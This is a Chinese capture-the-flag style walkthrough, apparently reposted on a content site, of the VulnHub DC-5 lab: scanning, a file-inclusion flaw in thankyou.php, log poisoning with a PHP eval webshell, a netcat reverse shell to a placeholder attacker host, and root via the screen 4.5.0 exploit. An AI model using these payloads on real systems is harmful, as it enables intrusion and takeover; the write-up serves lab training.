vulnhub DC-5靶场

这篇具有很好参考价值的文章主要介绍了vulnhub DC-5靶场。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录
  • 1.信息收集
  • 2.网站分析
  • 3.漏洞利用
  • 4.提升权限

1.信息收集

扫描主机

sudo arp-scan -l

扫描端口

nmap -p- 192.168.42.149

扫描指纹

whatweb 192.168.42.149

查看端口详细服务

nmap -A -p- -v 192.168.42.149

2.网站分析

扫描目录

dirbuster

浏览网站,发现都是静态页面

只有contact.php有上传窗口

尝试上传,发现问题copyright旁的数字发生变化,猜测thankyou.php存在文件包含

包含文件为footer.php

3.漏洞利用

开始bp测试字段(下面没图了,bp爆破,网站日志太大,无法连接蚁剑,建议大家在此靶场不要跑bp)

thankyou.php?file=/ect/passwd

植入一句话木马

thankyou.php?file=<?php @eval($_POST[cmd]);?>

由于前面信息收集我们确认了是nginx的站,访问日志和错误日志应该如下

/var/log/nginx/access.log

/var/log/nginx/error.log

文件包含,蚁剑连接shell

thankyou.php?file=/var/log/nginx/error.log

cmd

将shell反弹到kali上便于操作

s:nc hackip 8888 -e /bin/sh

监听

hack:nc -lvp 8888

优化界⾯

python -c "import pty;pty.spawn('/bin/bash')"

4.提升权限

提权常规命令

sudo -l

find / -perm -u=s -type f 2>/dev/null

提权命令网站

https://gtfobins.github.io/

发现screen 4.5.0,查找他的漏洞

searchsploit screen 4.5.0

searchsploit -m linux/local/41154.sh

下载攻击脚本

usr/share/exploitdb/exploits/linux/local/41154.sh

然后在桌面上用vim打开文件

发现脚本由三部分组成,两个c文件,一个命令集,拆分为三部分

(三选其一即可)

1.kali监听端口

python -m SimpleHTTPServer 8000

2.攻击机在kali上下载脚本

``wget 192.168.42.149:8888/libhax.c wget 192.168.42.149:8888/rootshell.c wget 192.168.42.149:8888/dc5.sh`

3.用蚁剑上传也可(必须上传在/tmp上,因为脚本写的是/tmp)

给脚本给权限

chmod +x dc5.sh

chmod 777 dc5.sh

在靶机上编译比较好,因为新版的kali可能版本较高

gcc -fPIC -shared -ldl -o libhax.so libhax.c

gcc -o rootshell rootshell.c

./dc5.sh执行脚本

提权成功文章来源地址https://www.toymoban.com/news/detail-750764.html

到了这里,关于vulnhub DC-5靶场的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub靶场DC-1练习

    下载链接:https://download.vulnhub.com/dc/DC-1.zip 介绍:There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.(一共有五个flags,最终目标是进入root用户的目录。) 启动以后如下图: 将

    2023年04月11日
    浏览(35)
  • vulnhub靶场之DC-2

    与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。 与最初的DC-1一样,它的设计考虑到了初学者。 Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。 就像DC-1一样,有五个标志,包括最后一个

    2024年01月22日
    浏览(41)
  • vulnhub练习 DC-1复现及分析

    靶机:DC-1 192.168.200.17 攻击机:kali 192.168.200.13 攻击机和靶机的网络连接方式要相同,另外DC-1的网络连接方式我这里采用NAT模式,是与kali的网络连接模式相同的(当然亦可以选用桥接模式) DC-1网络设计 点击高级后可以查看DC-1的靶机MAC地址,便于扫描IP时识别 KALI网络设计 根

    2024年02月21日
    浏览(39)
  • Web渗透漏洞靶场收集

    “如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。 初学的时候玩靶场会很有意思,可以练习各种思路和技巧,用来检测扫描器的效果也是很好的选择。今天,我们来数数那些

    2024年02月07日
    浏览(39)
  • 信息收集 - 网站服务器

    操作系统 区分大小写: 如果修改首页或其他页面的大小写后,网站返回一个错误页面,例如报错 \\\"404 Not Found\\\" 或类似的错误,这可能意味着网站运行在 Linux 或类 Unix 操作系统上。这是因为大多数 Linux 系统是区分大小写的 。 如果修改大小写后,网站页面正常显示,这可能意

    2024年02月21日
    浏览(49)
  • grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程

    漏洞名称 : grafana 目录遍历 (CVE-2021-43798) 漏洞描述 : Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是: grafana_host_url/public/plugins// ,其中是任何已安装插件的插件 ID。

    2024年02月15日
    浏览(39)
  • 信息收集-目录扫描(7kbscan御剑版)下载及使用

    例如:第二章-7kbscan御剑版 文章目录 前言 一、7kbscan御剑版          下载地址 二、使用步骤 1.引入库 2.读入数据 总结 提示: Web路径暴力探测工具-7kbscan御剑版 提示:以下是本篇文章正文内容,下面案例可供参考 下载地址 :  GitHub - 7kbstorm/7kbscan-WebPathBrute: 7kbscan-WebPath

    2024年02月13日
    浏览(53)
  • 网络&信息安全:nginx漏洞收集(升级至最新版本)

    💖The Begin💖点点关注,收藏不迷路💖 漏洞名称: nginx 越界写入漏洞(CVE-2022-41742) 风险等级: 高 高可利用: 否 CVE编号: CVE-2022-41742 端口(服务): 8000(nginx) 风险描述: NGINX 在 ngx_http_mp4_module 中存在漏洞,这可能允许攻击者激发 worker 进程的崩溃,或者通过使用特制的 mp4 文

    2024年04月11日
    浏览(50)
  • [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1靶机渗透思路及方法(个人分享) 靶机下载地址: https://download.vulnhub.com/dc/DC-1.zip 靶机地址:192.168.67.28 攻击机地址:192.168.67.3 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用  nmap  工具扫描靶机开放端口、服务版本

    2024年01月20日
    浏览(120)
  • [vulnhub]DC2

    信息收集 扫ip,有两种方式: arp 、 nmap 192.168.56.137 扫端口: flag1 我们使用浏览器登录80端口,发现登录不上,地址栏变为: http://dc-2 原因是dns解析不正确,我们需要在 hosts 文件中添加: 访问可以获得flag1 提示我们需要使用工具 cewl 获得字典,登录来获得flag2 flag2 cewl 首先需

    2024年02月15日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包